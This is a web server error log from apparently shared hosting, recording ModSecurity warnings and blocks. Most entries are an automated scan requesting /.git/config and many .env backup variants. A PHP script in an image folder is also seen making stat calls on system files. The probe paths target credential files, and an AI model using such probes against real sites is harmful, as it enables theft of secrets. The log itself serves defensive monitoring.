[Mon May 11 15:46:31.815942 2026] [security2:error] [pid 1320674:tid 1320693] [client 34.186.240.114:52680] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agHdtKO9RdIr1DwxYR2bEgAAAMM"]
[Mon May 11 15:46:31.817462 2026] [security2:error] [pid 1320398:tid 1320420] [client 34.186.240.114:52652] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agHdtOJEyNRN152ArOSTuAAAAFQ"]
[Mon May 11 15:46:31.817669 2026] [security2:error] [pid 1319885:tid 1319912] [client 34.186.240.114:52636] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agHdtFchVQ3tCn0m9OpfYQAAAQ4"]
[Mon May 11 15:46:31.819334 2026] [security2:error] [pid 1320398:tid 1320422] [client 34.186.240.114:52608] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agHdtOJEyNRN152ArOSTtwAAAFY"]
[Mon May 11 15:46:32.931568 2026] [core:error] [pid 1320398:tid 1320409] [client 146.190.248.96:43448] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://mail.castiglionecf.fr/
[Mon May 11 15:46:32.931595 2026] [core:error] [pid 1320398:tid 1320409] [client 146.190.248.96:43448] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://mail.castiglionecf.fr/
[Mon May 11 15:46:35.696867 2026] [core:error] [pid 1320398:tid 1320404] [client 146.190.248.96:36074] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://mail.castiglionecf.fr/
[Mon May 11 15:46:35.696895 2026] [core:error] [pid 1320398:tid 1320404] [client 146.190.248.96:36074] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://mail.castiglionecf.fr/
[Mon May 11 15:47:09.077816 2026] [security2:error] [pid 1319998:tid 1320004] [client 79.137.64.41:47526] ModSecurity: Warning. Invalid URL Encoding: Not enough characters at the end of input at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/\\"%s"] [unique_id "agHd3at2WtvoFr7xvGzbdwAAAIQ"]
[Mon May 11 15:47:32.569702 2026] [security2:error] [pid 1319998:tid 1320017] [client 43.155.140.157:58386] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.manhattan-studio.fr"] [uri "/"] [unique_id "agHd9Kt2WtvoFr7xvGzboAAAAJE"], referer: http://www.manhattan-studio.fr
[Mon May 11 15:47:50.116188 2026] [ssl:error] [pid 1319885:tid 1319907] (EAI 2)Name or service not known: [client 192.178.6.8:61174] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 15:47:50.116240 2026] [ssl:error] [pid 1319885:tid 1319907] AH01941: stapling_renew_response: responder error
[Mon May 11 15:47:51.590683 2026] [ssl:error] [pid 1319886:tid 1319914] (EAI 2)Name or service not known: [client 192.178.6.9:39480] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 15:47:51.590729 2026] [ssl:error] [pid 1319886:tid 1319914] AH01941: stapling_renew_response: responder error
[Mon May 11 15:48:06.644581 2026] [authz_core:error] [pid 1319886:tid 1319928] [client 52.140.115.251:65506] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/rest-api/error_log
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/3c/94a41868acedbf6b992ee0ac410b84e20310f1 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/3c/94a41868acedbf6b992ee0ac410b84e20310f1 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 15:49:14.755651 2026] [security2:error] [pid 1320674:tid 1320701] [client 43.156.228.27:41270] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "totalcloud.fr"] [uri "/"] [unique_id "agHeWqO9RdIr1DwxYR2b8gAAAMs"]
[Mon May 11 15:49:14.757639 2026] [autoindex:error] [pid 1320674:tid 1320701] [client 43.156.228.27:41270] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 15:50:03.233445 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHei6y-5-wpj6Sx56aiUwAAABc"]
[Mon May 11 15:50:03.233936 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHei6y-5-wpj6Sx56aiUwAAABc"]
[Mon May 11 15:50:03.234191 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHei6y-5-wpj6Sx56aiUwAAABc"]
[Mon May 11 15:50:03.446691 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHei6y-5-wpj6Sx56aiVQAAABc"]
[Mon May 11 15:50:03.447174 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHei6y-5-wpj6Sx56aiVQAAABc"]
[Mon May 11 15:50:03.447429 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHei6y-5-wpj6Sx56aiVQAAABc"]
[Mon May 11 15:50:03.541425 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHei6y-5-wpj6Sx56aiVgAAABc"]
[Mon May 11 15:50:03.541909 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHei6y-5-wpj6Sx56aiVgAAABc"]
[Mon May 11 15:50:03.542179 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHei6y-5-wpj6Sx56aiVgAAABc"]
[Mon May 11 15:50:03.636387 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHei6y-5-wpj6Sx56aiVwAAABc"]
[Mon May 11 15:50:03.636866 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHei6y-5-wpj6Sx56aiVwAAABc"]
[Mon May 11 15:50:03.637121 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHei6y-5-wpj6Sx56aiVwAAABc"]
[Mon May 11 15:50:03.731534 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.staging"] [unique_id "agHei6y-5-wpj6Sx56aiWAAAABc"]
[Mon May 11 15:50:03.732019 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.staging"] [unique_id "agHei6y-5-wpj6Sx56aiWAAAABc"]
[Mon May 11 15:50:03.732277 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.staging"] [unique_id "agHei6y-5-wpj6Sx56aiWAAAABc"]
[Mon May 11 15:50:03.826515 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHei6y-5-wpj6Sx56aiWQAAABc"]
[Mon May 11 15:50:03.826999 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHei6y-5-wpj6Sx56aiWQAAABc"]
[Mon May 11 15:50:03.827283 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHei6y-5-wpj6Sx56aiWQAAABc"]
[Mon May 11 15:50:03.921516 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.test"] [unique_id "agHei6y-5-wpj6Sx56aiWwAAABc"]
[Mon May 11 15:50:03.922009 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.test"] [unique_id "agHei6y-5-wpj6Sx56aiWwAAABc"]
[Mon May 11 15:50:03.922255 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.test"] [unique_id "agHei6y-5-wpj6Sx56aiWwAAABc"]
[Mon May 11 15:50:04.016858 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.remote"] [unique_id "agHejKy-5-wpj6Sx56aiXAAAABc"]
[Mon May 11 15:50:04.017349 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.remote"] [unique_id "agHejKy-5-wpj6Sx56aiXAAAABc"]
[Mon May 11 15:50:04.017591 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.remote"] [unique_id "agHejKy-5-wpj6Sx56aiXAAAABc"]
[Mon May 11 15:50:04.121892 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHejKy-5-wpj6Sx56aiXQAAABc"]
[Mon May 11 15:50:04.122340 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHejKy-5-wpj6Sx56aiXQAAABc"]
[Mon May 11 15:50:04.122557 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHejKy-5-wpj6Sx56aiXQAAABc"]
[Mon May 11 15:50:04.217029 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agHejKy-5-wpj6Sx56aiXgAAABc"]
[Mon May 11 15:50:04.217502 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agHejKy-5-wpj6Sx56aiXgAAABc"]
